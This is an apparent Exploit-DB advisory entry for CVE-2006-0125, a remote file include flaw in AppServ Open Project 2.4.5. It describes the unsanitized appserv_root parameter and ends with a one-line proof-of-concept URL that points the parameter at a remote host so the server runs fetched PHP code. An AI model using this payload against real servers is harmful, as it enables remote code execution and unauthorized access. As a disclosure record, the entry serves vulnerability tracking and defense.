AppServ Open Project 2.4.5 - Remote File Include Vulnerability



EDB-ID: 27048 CVE: 2006-0125 OSVDB-ID: 22228
Author: Xez Published: 2006-01-09 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
source: http://www.securityfocus.com/bid/16166/info

AppServ Open Project is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

This issue affects version 2.4.5; other versions may also be vulnerable. 

http://www.example.com/appserv/main.php?appserv_root=http://www.example.com/